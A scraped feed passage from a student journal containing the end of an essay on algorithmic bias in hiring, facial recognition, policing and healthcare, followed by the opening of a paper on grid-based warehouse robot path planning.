<p>Definition:‬‭ Data augmentation involves using existing‬‭ training data and modifying it to create new instances that enhance machine learning model training. This technique helps address the issue of insufficient data by artificially increasing the volume, quality, and diversity of training data‬‭ (Mumuni &amp; Mumuni, 2022)‬‭ . </p>



<p><span style="text-decoration: underline;">Mechanism</span>:‬‭ Common data augmentation methods for images include rotating, flipping, or cropping. For text data or data used in hiring practices, data augmentation techniques include synonym replacement, paraphrasing, and numerically variating data (see Figure 5). </p>



<p><span style="text-decoration: underline;">Advantages</span>:‬‭ Augmenting data increases the diversity‬‭ of the training dataset, allowing models to generalize unseen data better. Expanding a dataset also helps reduce overfitting, where a model memorizes the training data rather than learning its underlying patterns. Data augmentation allows a model to recognize patterns, increasing its ability to handle real-world variations.</p>



<p><span style="text-decoration: underline;">Limitations</span>:‬‭ However, augmented data may not always reflect real-world scenarios, potentially leading to overfitting if the modifications are not representative. Extreme data augmentation can introduce excess and unimportant information, deteriorating a model’s quality‬‭ (Walidamamou, 2023)‬‭ . </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="532" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1024x532.png" alt="" class="wp-image-4032" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1024x532.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-300x156.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-768x399.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1000x519.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-350x182.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-480x249.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM.png 1152w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 5:‬‭ A visual demonstration of an augmented dataset‬‭ where data is generated using information derived from the original training set. The available examples are diversified through slight variations, such as synonym replacement, slight paraphrasing, and numerical variations. They are combined with the original data to create a more diverse data set. </figcaption></figure>



<h4 class="wp-block-heading">3.2 Vector Space Correction </h4>



<p><span style="text-decoration: underline;">Definition</span>:‬‭ The vector space is a mathematical framework in which data points, such as words and images, are represented as vectors in a multidimensional space. Vector space correction helps mitigate biases by equalizing the distance between the protected attributes (such as race or gender) and the biased concept‬‭ (Albaroudi et al., 2024)‬‭ . See Figure 4 for a simplified visual demonstration. </p>



<p><span style="text-decoration: underline;">Mechanism</span>:‬‭ The process involves adjusting the positions‬‭ of vectors to reduce biases. For example, if a vector model leans towards associating white people with better skills and qualifications, the vector space correction technique will associate the same skills and qualifications with Black people. </p>



<p><span style="text-decoration: underline;">Advantages</span>:‬‭ This technique helps create a more balanced‬‭ representation of different groups, which can reduce the impact of biased data on model predictions. </p>



<p><span style="text-decoration: underline;">Limitations</span>:‬‭ Vector space correction can cause semantic drift, where adjustments in the vector space may unintentionally change the meanings and relationships of the data points. This can lead to inaccurate predictions and misinterpretations of ideas, making it harder for algorithms to accurately reflect real-world scenarios. Another limitation of this approach is that biases related to more than one attribute are hard to correct because many factors need to be considered before rearranging the vector space. </p>



<h4 class="wp-block-heading">3.3 Blind Hiring </h4>



<p><span style="text-decoration: underline;">Definition</span>:‬‭ Blind hiring is a recruitment strategy‬‭ that aims to eliminate bias by removing personal information from decision-making systems. Personal information such as names, zip codes, and health records can sometimes be indicators of social class, gender, age, or racial background. </p>



<p><span style="text-decoration: underline;">Mechanism‬‭</span> : This technique focuses on evaluating candidates‬‭ based solely on their skills and qualifications, removing the chances of being unconsciously influenced in hiring decisions. </p>



<p><span style="text-decoration: underline;">Advantages‬‭</span> : One advantage of blind hiring is that‬‭ it promotes diversity by allowing candidates from varied backgrounds to compete on an equal footing. Ultimately, this practice can lead to a more inclusive workplace culture overall. </p>



<p><span style="text-decoration: underline;">Limitations‬‭</span> : While blind hiring practices aim to eliminate visible identifiers, such as names and genders, they do not fully address the underlying gender, racial, or social biases in the hiring process. This is because specific keywords can still influence perceptions and decisions, as they carry implicit biases that favor one group over another, regardless of the removal of direct identifiers (see Figure 6). For example, masculine traits typically include characteristics like confidence and competitiveness, whereas feminine traits often encompass emotional qualities like warmth, supportiveness, and collaboration‬‭ (Albaroudi et al., 2024)‬‭ . </p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="774" height="478" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM.png" alt="" class="wp-image-4033" style="width:522px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM.png 774w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-768x474.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-480x296.png 480w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">Figure‬‭ 6:‬‭ A showcase of character traits perceived‬‭ as masculine vs feminine. Masculine words tend to be associated with dominance, while feminine words tend to be associated with emotional intelligence. </figcaption></figure>



<h2 class="wp-block-heading">4. Addressing Algorithmic Bias in Broader Decision-Making Systems </h2>



<p>Beyond job hiring, cases of algorithmic bias appear in various fields, including facial recognition technologies, predictive policing, and healthcare (see Figure 8). The following sections will explore how these biases manifest in these areas and examine their implications. </p>



<h4 class="wp-block-heading">4.1 Facial Recognition Technology </h4>



<p>Facial recognition technologies (FRT) are used to identify faces in static or moving images. The accuracy of an FRT depends upon the quality of the image it assesses and the makeup of the algorithm itself. FRTs are popular in authentication processes, police work, and medical diagnosis. However, many FRTs have been found to exhibit algorithmic bias, leading to disparities in accuracy based on race, gender, and other demographic factors. FRTs first capture the details of an image, identifying if it is human or not. A person’s face is broken down into key features, such as the distance between the eyes and the shape of the cheekbones. This information is translated into a faceprint, uniquely given to each individual. The faceprint is compared to images in a database to find a possible match (see Figure 7). False positives and false negatives are possible. A false positive is misreading an image as a match when it is not, whereas a false negative fails to match the face. Challenges such as the quality of available images, lighting, and facial expressions can affect the accuracy of FRTs. </p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="998" height="504" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM.png" alt="" class="wp-image-4034" style="width:494px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM.png 998w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-300x152.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-768x388.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-230x116.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-350x177.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-480x242.png 480w" sizes="(max-width: 998px) 100vw, 998px" /><figcaption class="wp-element-caption">Figure 7:‬‭ The 3 components of the facial recognition software system. The image is captured, converted into a digital representation (faceprint), and given a match score. A match score is a numerical value that helps determine if the individual’s face corresponds with an existing entry in the system, completing the identity verification process (‬‭ Lomibao, 2020). </figcaption></figure>



<p>Studies show that FRTs are often more accurate for lighter-skinned males but tend to misidentify women and individuals with darker skin tones at significantly higher rates. The Amazon Rekognition System resulted in higher accuracy for white and black men than white women (93%) and dark-skinned women (68.6%). The U.S. National Institute of Standards and Technology (NIST) also found higher rates of false positives for Asian and African American faces in comparison to Caucasian faces using the FBI’s database of 1.6 million domestic mugshots‬‭ (Fountain, 2022)‬‭ . </p>



<p>Further diversifying datasets to train from more racial and ethnic groups will help mitigate algorithmic bias and promote fairer outcomes. However, establishing and adhering to rigorous standards is also essential to improve the quality and accountability of this technology. </p>



<h4 class="wp-block-heading">4.2 Predictive Policing </h4>



<p>Predictive policing is a law enforcement technique that uses data and algorithms to predict where and when crimes will occur. The goal is to use this information to prevent crime, but it has emerged as a controversial approach to law enforcement. One of the early implementations, CompStat in New York City during the 1990s, employed visual tools like pin maps to display crime data by frequency and location‬‭ (Fountain, 2022)‬‭ . However, while CompStat aimed to promote efficiency and accountability, it also contributed to problematic practices such as &#8220;stop and frisk,&#8221; which is the practice of stopping individuals for questioning, sometimes without reasonable suspicion. This practice disproportionately targeted racial minorities, and research has shown that these practices can lead to lasting psychological harm. </p>



<p>The practice has raised significant concerns about algorithmic bias and its implications for marginalized communities. Some algorithms may produce biased results that lead to over-policing or police being repeatedly deployed to neighborhoods based on skewed data of specific neighborhoods. Some municipal governments have implemented executive orders banning the use of predictive policing software. However, while bans are effective in the short run, they are not a substitute for legislative action. At the root, a larger focus on addressing algorithmic bias is crucial to ensure that predictive policing does not aggravate existing inequalities in the criminal justice system. </p>



<h4 class="wp-block-heading">4.3 Healthcare Algorithms </h4>



<p>In the healthcare industry, algorithms have also been shown to lead to racial bias. A recent study found bias in an algorithm that generated individual-level medical risk scores affecting 200 million people. The algorithm identifies patients for &#8220;high-risk care management&#8221; but relies on healthcare costs as a proxy for illness, leading to biased outcomes. The algorithm assumed that those with higher medical costs were sicker. However, Black patients, despite having higher levels of illness than their White counterparts with the same risk score, tend to generate lower healthcare costs due to limited access to care and implicit biases in care. Additionally, Black patients tend to spend more on emergency visits and dialysis costs rather than inpatient surgeries and outpatient specialist costs, which cost more‬‭ (Fountain, 2022)‬‭ . </p>



<p>This research emphasized that biases often arise from flawed labels reflecting structural inequalities. Addressing these biases through improved algorithm design and iterative testing can lead to fairer outcomes, opening pathways for more equitable healthcare solutions. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="442" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1024x442.png" alt="" class="wp-image-4035" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1024x442.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-300x130.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-768x332.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1000x432.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-230x99.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-350x151.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-480x207.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM.png 1324w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 8:‬‭ Besides job hiring, algorithmic biases exist in various societal places. Facial recognition technologies can misidentify individuals, particularly women and people of color, due to biased training data, leading to wrongful accusations or surveillance. Predictive policing occurs because algorithms used to predict crime can reinforce existing biases by over-policing specific communities based on historical data. Healthcare algorithms also possess biases, resulting in unequal treatment, with certain groups receiving less accurate diagnoses or care recommendations. </figcaption></figure>



<h2 class="wp-block-heading">5. Conclusion </h2>



<p>Algorithmic bias poses significant challenges across various sectors of the economy, often disproportionately affecting marginalized communities. As hiring practices evolve, companies increasingly rely on AI to make recruitment more efficient, yet this shift has also introduced unintended barriers to diversity, equity, and inclusion (DEI). Organizations aiming to improve the DEI culture must prioritize transparency, accountability, and ethical considerations in their hiring algorithm designs. While technical solutions are essential, they often are not enough on their own. This shows how crucial it is to have strong laws to tackle algorithmic bias. Passing effective legislation is a moral responsibility to ensure that technology benefits everyone. The future of mitigating algorithmic bias depends on global collaboration. By passing thoughtful laws, we can build a technology environment that helps everyone, creating a fairer society that supports communities in a world that relies more and more on automation. </p>



<h2 class="wp-block-heading">6. References </h2>



<p>Albaroudi, E., Mansouri, T., &amp; Alameer, A. (2024). A Comprehensive Review of AI Techniques for Addressing Algorithmic Bias in Job Hiring.‬‭ AI‬‭ ,‬‭ 5‬‭ (1), Article 1. https://doi.org/10.3390/ai5010019 </p>



<p>Bîgu, D., &amp; Cernea, M.-V . (2019).‬‭ Algorithmic Bias‬‭ in Current Hiring Practices: An Ethical Examination‬‭ . </p>



<p>Chiu, R. (n.d.).‬‭ Can We Fix AI Hiring Bias? | Policy‬‭ Commons‬‭ . Retrieved October 24, 2024, from‬‭ https://policycommons.net/artifacts/1320212/can-we-fix-ai-hiring-bias/1923502/‬‭ . </p>



<p>Dastin, J. (2022). Amazon Scraps Secret AI Recruiting Tool that Showed Bias against Women*. In K. Martin,‬‭ Ethics of Data and Analytics‬‭ (1st ed.,‬‭ pp. 296–299). Auerbach Publications. https://doi.org/10.1007/s00146-022-01574-0‬‭ . </p>



<p>Fountain, J. E. (2022). The moon, the ghetto and artificial intelligence: Reducing systemic racism in computational algorithms.‬‭ Government Information Quarterly‬‭ ,‬‭ 39‬‭ (2), 101645. https://doi.org/10.1016/j.giq.2021.101645‬‭ . </p>



<p>Frissen, R., Adebayo, K. J., &amp; Nanda, R. (2023). A machine learning approach to recognize bias and discrimination in job advertisements.‬‭ AI &amp; SOCIETY‬‭ ,‬‭ 38‬‭ (2), 1025–1038. https://doi.org/10.1007/s00146-022-01574-0‬‭ . </p>



<p>Lomibao, L. (2020, December 13). Factsheet: Facial Recognition Technology (FRT).‬‭ Stop LAPD Spying Coalition‬‭ .‬‭ https://stoplapdspying.org/facial-recognition-factsheet/‬‭ . </p>



<p>Mumuni, A., &amp; Mumuni, F. (2022). Data augmentation: A comprehensive survey of modern approaches.‬‭ Array‬‭ ,‬‭ 16‬‭ , 100258.‬‭ https://doi.org/10.1016/j.array.2022.100258‬‭ . </p>



<p>Sadek, T., Stanley, K. D., Smith, G., Marcinek, K., Cormarie, P., &amp; Gunashekar, S. (2024). Artificial Intelligence Impacts on Privacy Law‬‭ . RAND‬‭ Corporation. https://www.rand.org/pubs/research_reports/RRA3243-2.html‬‭ . </p>



<p>Sen, S. (2023, September 22). Applicant Tracking System: The Ultimate Guide to Smart Hiring. Asanify. https://asanify.com/blog/human-resources/applicant-tracking-system-the-ultimate-guide-t o-smart-hiring/‬‭ . </p>



<p>The Ultimate Guide to AI in recruiting [2024]‬‭ . Joveo.‬‭ (2024, October 4). https://www.joveo.com/the-ultimate-guide-to-ai-in-recruiting/‬‭ . </p>



<p>The Three Challenges of AI Regulation‬‭ . (n.d.).‬‭ Brookings. Retrieved October 19, 2024, from https://www.brookings.edu/articles/the-three-challenges-of-ai-regulation/‬‭ .‬</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Sanaa Gada
</h5><p>Sanaa is a passionate high school senior looking to study computer science in college, with a focus on developing technology that bridges the gap for marginalized communities. She enjoys giving back to the community via projects that support the rising generation such as leading science experiments and teaching programming to underprivileged youth. In her free time, Sanaa enjoys baking, dancing, hiking, and babysitting.
</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/">Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</title>
		<link>https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics</link>
		
		<dc:creator><![CDATA[Paarth Sonkiya]]></dc:creator>
		<pubDate>Sun, 20 Oct 2024 22:26:22 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=3892</guid>

					<description><![CDATA[<p>Paarth Sonkiya</p>
<p>The post <a href="https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/">Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Paarth Sonkiya<em><br></em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>In practical warehouse scenarios, route optimization is an important factor due to its large impact on the cost and time efficiency of a warehouse. This directly affects the overall productivity of a warehouse. Many algorithms have been developed to address this issue- the most commonly used in the industry include the A* algorithm and Dijkstra’s algorithm. While most provide appropriate usage in static ware- house environments, many often fall short in dynamic warehouses, where they are unable to efficiently adapt to changing layouts and obstacles without compromising on time and cost efficiency. This study proposes a lattice-based two-dimensional algorithm designed to navigate warehouses while also avoiding obstacles efficiently. Employing this algorithm can result in substantial cost reductions, as it optimizes travel distances and resource allocation. Moreover, the algorithm enhances the time efficiency signifi- cantly by reducing order fulfillment. This research offers a practical solution to a persistent challenge in modern warehouse logistics. The effectiveness of the proposed algorithm suggests its potential to revolutionize the industry’s approach to route optimization.</p>



<p>Keywords Lattice Paths · Route optimization · Warehouse · AGVs</p>



<h2 class="wp-block-heading">1 Introduction</h2>



<p>With the rise of the internet, there has been a rapid surge in the e-commerce sector. Online shopping in particular has grown exponentially due to factors like wider product selection, convenience and better pricing. This growth has increased the demand for more efficient and productive warehouse operations to meet the growing customer expectations for fast and reliable delivery. With this, new entrepreneurs have entered the industry, making warehouse logistics a highly competitive sector. Warehouses face constant pressure to optimize processes and reduce costs to remain profitable. Because of this rise in competitiveness, newer problems came to being. One of the most critical factors affecting the overall productivity of a warehouse is the storage and retrieval of goods. Many traditional methods are slow, inefficient, and prone to a lot of errors. Most modern warehouses now address these challenges by utilizing automated guided vehicles (AGVs) to streamline storage and retrieval operations. The integration of AGVs and warehouse robots has significantly enhanced transportation speed and precision. These automated systems can improve efficiency, reduce labor costs, and minimize picking errors. Therefore, optimizing path planning for these automated robots can greatly affect the operational efficiency of warehouses. However, navigating warehouse environments optimally remains a key challenge as they introduce complexities that traditional pathfinding algorithms struggle to handle. This can include obstacles- such as unpredictable inventory placement, forklifts and personnel- computational efficiency and time taken. Existing pathfinding algorithms often fall short in these dynamic environments. This paper proposes a novel two-dimensional grid model and an optimized algorithm specifically designed to address these challenges and enable efficient robot navigation in dynamic warehouses.</p>



<p>Researchers over the past decade have developed several methodologies to address this persisting problem. The most popular algorithms used today include the Dijkstra’s and A* algorithm. Dijkstra’s algorithm [1] works by transforming the warehouse layout into a graph. Each aisle intersection becomes a node, and paths between them become edges with weights representing travel time or distance. The algorithm then iteratively explores these connections, prioritizing unvisited nodes with the lowest total travel distance from the starting point. This efficiently determines the shortest path for a robot or picker to reach any destination within the warehouse. The algorithm guarantees finding the optimal path but can be computationally expensive for large and complex warehouses. Additionally, it struggles to adapt to dynamic changes like moving obstacles [5]. The A* search algorithm builds upon Dijkstra’s algorithm by incorporating a heuristic function to prioritize exploration towards the goal. A heuristic function is an informed estimate of the cost (distance, time, etc.) to reach the goal from a particular point in the environment. These estimates help the algorithms prioritize exploring more promising paths that are likely to lead to the goal faster. For example, in a two dimensional grid representing a warehouse, a common heuristic function might be the Manhattan distance between a cell and the goal location [4]. This estimates the minimum number of horizontal and vertical steps required to reach the goal, ignoring obstacles. Heuristics play a crucial role in path selection by directing the search towards more efficient paths. Algorithms like A* use the total cost (combination of movement cost and heuristic estimate) to evaluate neighboring cells and prioritize those with a lower total cost. This strategy helps them focus their search on promising areas and avoid exploring irrelevant parts of the environment. Therefore, this is similar to the method the proposed algorithm builds up on. This leads to faster path finding, especially in complex environments. However, the traditional A* algorithm can still be computationally expensive for very large warehouses [3].</p>



<p>There have been many other approaches to this problem as well. For instance, the research by Yang et al. [6] introduces the concept of the largest convex polygon (LCP) to illustrate the shortest path to traverse all goods locations in an ideal condition. This involves getting an initial node, establishing a Cartesian coordinate system, and then adding nodes based on their positions relative to the initial node. This method could potentially improve vehicular navigation due to its shown reduction in time complexity and path length, but the method does not consider the real-world complexities which impacts its applicability in practical scenarios. In their study, Roodbergen et al. [2] propose a branch-and-bound algorithm adapted from the Travelling Salesman Problem (TSP) to identify the shortest path within a parallel aisle warehouse. This approach is specifically designed for warehouses with crossovers at both the ends and midpoints of aisles. The authors compare their algorithm’s performance to established routing heuristics like S-shape, aisle-by- aisle, largest gap, and a combined method. Additionally, they explore the impact of warehouse layout on efficiency, demonstrating that incorporating cross aisles can significantly reduce travel time during picking operations by offering more direct routes. However, the paper did not explore the impact of non-random storage assignment rules on heuristic performance, which could be crucial in real warehouse settings.</p>



<p>Most existing algorithms exhibit limitations in scalability and computational time as warehouse complex- ity increases. Similarly, path planning methods for warehouse robots often struggle with slow convergence and neglect downstream impacts. These challenges highlight the need for advanced AGV scheduling and path planning algorithms that can adapt to dynamic environments and scale efficiently. Therefore, this re- search focuses on employing lattice pathfinding algorithms to optimise route planning in warehouse logistics, with a specific emphasis on effective obstacle avoidance. The objectives include developing and optimis- ing a specialised lattice pathfinding algorithm, evaluating its performance against traditional methods, and providing practical recommendations for real-world warehouse navigation challenges.</p>



<h2 class="wp-block-heading">2 Problem Description</h2>



<p>This research specifically focuses on block stocking warehouses, also known as pile-type warehouses. Figure 1 shows a simplified model of the warehouse. The red squares represent the area that is occupied by a single block and the blue square shows the area an AGV can go to for the retrieval of goods.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="714" height="660" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM.png" alt="" class="wp-image-3894" style="width:526px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM.png 714w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-300x277.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-230x213.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-350x324.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-480x444.png 480w" sizes="(max-width: 714px) 100vw, 714px" /><figcaption class="wp-element-caption">Figure 1: A Simple representation of a block stocking warehouse.</figcaption></figure>



<p>For simplicity, a translated version of this warehouse image is considered in this paper, as shown in Figure 2. The intersection of the grid lines or nodes represent each block and the lines represent the path a robot can take. The advantage of using a simplified lattice path model allows the easy facilitation of pathfinding algorithms. This allows the algorithms to easily explore the grid, evaluating possible movement options between connected cells, and ultimately identify the optimal path for the robot to navigate within the warehouse.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="698" height="668" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM.png" alt="" class="wp-image-3895" style="width:508px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM.png 698w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-300x287.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-230x220.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-350x335.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-480x459.png 480w" sizes="(max-width: 698px) 100vw, 698px" /><figcaption class="wp-element-caption">Figure 2: The equivalent simplified model. Figure 3 portrays a model of a real-life warehouse.</figcaption></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="1022" height="974" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM.png" alt="" class="wp-image-3896" style="width:454px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM.png 1022w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-300x286.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-768x732.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-1000x953.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-230x219.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-350x334.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-480x457.png 480w" sizes="(max-width: 1022px) 100vw, 1022px" /><figcaption class="wp-element-caption">Figure 3: Model of a realistic block warehouse with Navigation information.</figcaption></figure>



<p>This model depicts a more expansive and complex environment, similar to a modern warehouse, where there are hundreds of blocks and isles. The figure visually depicts the path a robot needs to take for the retrieval of goods within the warehouse environment. This illustration provides the robot’s navigation process and the key elements involved.</p>



<p>The green dot indicates the starting point for the robot’s journey. This can be the robot’s charging station or a designated starting location within the warehouse. The blue dots represent the specific locations, or blocks, within the warehouse that the robot needs to visit to retrieve goods. These blocks could correspond to individual storage locations, picking stations, or designated areas where specific items are stored. The sequence and order of visiting these blue dots therefore determine the efficiency of the overall retrieval process. The red dot signifies the final destination for the robot after completing its goods retrieval task. This point could be a designated drop-off location or the robot’s charging station, depending on the specific workflow. Figure 4 translates this large-scale warehouse model into a corresponding simplified lattice path model. Similar to the previous lattice model, this representation abstracts the physical layout into a two-dimensional grid. This model incorporates a larger grid size to accommodate the increased complexity of the real- world warehouse. Translating real-world warehouse layouts into simplified lattice path models is crucial for pathfinding algorithms for both simplicity and effectiveness. These algorithms operate more effectively within the grid structure, allowing them to determine optimal paths for robots navigating the actual warehouse environment while reducing the complexity. The figure also represents obstacles in the path, where the solid black squares denote the obstacles through which robots cannot pass. This scenario emphasises the challenges faced by robots performing tasks like navigation and path planning within warehouses.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="974" height="886" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM.png" alt="" class="wp-image-3897" style="width:510px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM.png 974w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-300x273.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-768x699.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-230x209.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-350x318.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-480x437.png 480w" sizes="(max-width: 974px) 100vw, 974px" /><figcaption class="wp-element-caption">Figure 4: Simplified model of a realistic block warehouse with obstacles.</figcaption></figure>



